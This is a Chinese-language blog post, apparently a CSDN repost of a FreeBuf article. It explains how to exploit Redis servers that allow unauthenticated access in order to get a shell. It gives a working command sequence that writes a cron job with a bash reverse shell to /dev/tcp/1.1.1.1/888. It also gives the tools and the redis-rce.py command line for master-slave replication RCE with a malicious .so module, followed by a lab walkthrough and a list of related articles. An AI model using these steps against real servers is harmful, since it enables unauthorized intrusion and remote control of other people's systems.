redis 未授权访问利用 两种方式

最新推荐文章于 2024-05-09 00:07:21 发布
最新推荐文章于 2024-05-09 00:07:21 发布
阅读量2.1k 收藏
点赞数 1
原文链接:https://www.freebuf.com/vuls/224235.html
版权

1、未授权访问漏洞

Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。

当拿到数据库权限是不会满足我们的,我们的目标只有一个getshell!

目前较主流的两个方法,第一种定时计划反弹shell、第二种利用主从复制rce。

2、定时计划反弹shell

1)set x “\n* * * * * bash -i >& /dev/tcp/1.1.1.1/888 0>&1\n”

2)config set dir /var/spool/cron/

3)config set dbfilename root

4)save

3、利用主从复制rce

漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。

需要利用一个工具,GitHub下载即可。

1)git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand(需要make)

2)git clone https://github.com/Ridter/redis-rce.git

进而通过未授权访问或者弱口令连接redis,执行脚本即可获取shell。

4、决胜千里之外,实战演练:

本次扫到了6379也就是Redis,有的时候可能或改默认端口,建议全端口扫描,本次利用主从复制rce获取shell(由于该漏洞已提交src,签约保密协议,故搭建靶机还原真实环境,保证原汁原味。)

攻击端ip:192.168.109.134

服务端ip:192.168.109.136

通过未授权访问连接redis(如果有密码,可以尝试爆破,authpassword 登陆系统):Redis-cli –h ip


利用主从复制rce获取shell

首先要生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成。

攻击端执行:

python redis-rce.py -r 目标ip-p 目标端口 -L 本地ip -f 恶意.so

成功获取shell

 

whatday
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1.Redis授权访问
weixin_44616172的博客
06-01 326
把 #bind 127.0.0.1前面的注释#号去掉,然后把127.0.0.1改成你允许访问你的redis服务器的ip地址,表示只允许该ip进行访问,这种情况下,我们在启动redis服务器的时候不能再用:redis-server,改为:redis-server path/redis.conf 即在启动的时候指定需要加载的配置文件,其中path/是你上面修改的redis配置文件所在目录,这个方法有一点不太好,我难免有多台机器访问一个redis服务。这里没有密钥文件,我们直接在靶机上创建。
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
在Windows系统中,令牌窃取和进程注入是两种本地提权技术。在Windows 2008和7中,攻击者可以利用远程过程调用的漏洞,生成特权安全令牌执行高权限操作。例如,使用incognito工具的list_tokens -u impersonate_token ...
Redis授权访问利用方式(ubuntu
weixin_44843084的博客
06-07 528
Redis授权访问利用方式(ubuntu 安装 ubuntu https://blog.csdn.net/hzlarm/article/details/99432240 sudo apt-get install redis-server sudo vi /etc/redis/redis.conf #bind 127.0.0.1 propected-mode no 重启sudo srevice redis restart kali https://www.cnblogs.com/littlemood/p/
Redis授权访问
npc88888的博客
05-09 1218
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
Redis授权访问漏洞利用
qq_46634561的博客
09-22 1288
一,Centos7下redis授权访问漏洞利用方式1、何为redis,有什么内涵2、获取web服务的webshell3、写ssh-keygen公钥登录服务器4、利用计划任务执行命令反弹shell 1、何为redis,有什么内涵 一、Redis介绍 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助
redis授权访问
Cfoxer的博客
08-08 2250
redis授权访问,一句话木马写入getshell,Redis授权写SSH公钥获得shell,Redis授权写定时任务反弹shell
REDIS FOR Windwos 64
12-22
8. **持久化**:Redis支持RDB(快照)和AOF(Append Only File)两种持久化方式,确保数据在重启后不丢失。RDB定期保存当前数据库状态,而AOF记录每次写操作日志,可在需要时重放日志恢复数据。 9. **主从复制**:...
redis -3.0.501 -windows x64
01-29
Redis支持两种数据持久化方式:RDB(快照)和AOF(Append Only File)。RDB会在指定时间间隔或触发事件时生成数据快照;AOF则记录所有写操作,以追加模式保存到日志文件。你可以根据需求选择合适的方式。 8. **...
Redis-x64-3.0.501.zip
02-20
- **持久化**:了解RDB和AOF(Append Only File)两种持久化方式,选择适合你需求的方案。 - **监控**:利用`redis-cli.exe`进行日常管理和监控,使用`EventLog.dll`记录日志信息。 - **性能测试**:定期使用`redis-...
springboot与shiro,mybatis,redis的整合项目
04-02
通过shiro进行授权和认证,分为普通用户和管理员两种角色,普通用户只能访问商品,管理员可以访问商品和用户界面。登录时利用redis缓存。里面包含数据库文件希望能帮助到大家学习.前台是vue.js。这个没有进行密码...
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Redis授权访问的三种利用方式
m0_67402914的博客
08-30 2119
Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。
修补--Redis授权访问漏洞
weixin_30342209的博客
01-09 326
--------------------------------阿里云解决方案-----------------------------------一.漏洞描述Redis因配置不当可以导致授权访问,被攻击者恶意利用。当前流行的针对Redis授权访问的一种新型攻击方式,在特定条件下,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器,可导致服...
Redis授权访问漏洞的重现与利用
qq_40882763的博客
03-24 1855
Redis 默认情况下,会绑定在 0.0.0.0:6379,,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。
redis授权访问漏洞利用+redis日志分析
ChenD的学习笔记
05-22 1470
下载: wget http://download.redis.io/releases/redis-2.8.17.tar.gz。将redis-server复制到/usr/bin目录下:cp redis-server /usr/bin/将只允许本地连接注释掉,保护模式关掉,然后保存一下,再启动redis服务,再使用kali连接一下。将redis-cli复制到/usr/bin目录下:cp redis-cli /usr/bin/将redis-server 移动到/usr/bin/
提权的魅力——redis授权漏洞
苟有恒,必有三更眠,五更起。
11-19 4614
0x00 靶场最后那个flag3在root目录下,是没有权限读的。 拿到flag2以后,下面有个那行redis是提示 , 他给了redis远程登陆的密码 , 可以用哪个东西提权以后再拿flag3 redis授权访问的漏洞 0x01 redis是什么? Redis 是一个高性能的key-value数据库。 redis的出现,很大程度补偿了memcached这类key/value存储
redis授权访问漏洞利用
weixin_53562844的博客
05-07 2165
redis是一个key-value存储系统,拥有强大的功能,目前普及率很高,redis是用ansic语言编写,支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的APL,reids默认端口是6379。造成授权漏洞的原因是安全配置作限制,redis默认情况是空密码连接。 利用条件:redis <3.2 利用原理:redis绑定在0.0.0.0:6379,且没有进行添加安全策略,直接暴露在公网,默认是空密码,可以让攻击者免密码登录redis服务。 靶机:192.
Redis 授权访问
qq_61553520的博客
05-17 454
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。默认情况下绑定在127.0.0.1:6379,在没有进行采用相关的策略,如添加防火墙规则避免其他非信任来源ip访问等,Redis服务将会暴露到公网上,以及在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下进行授权访问Redis
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值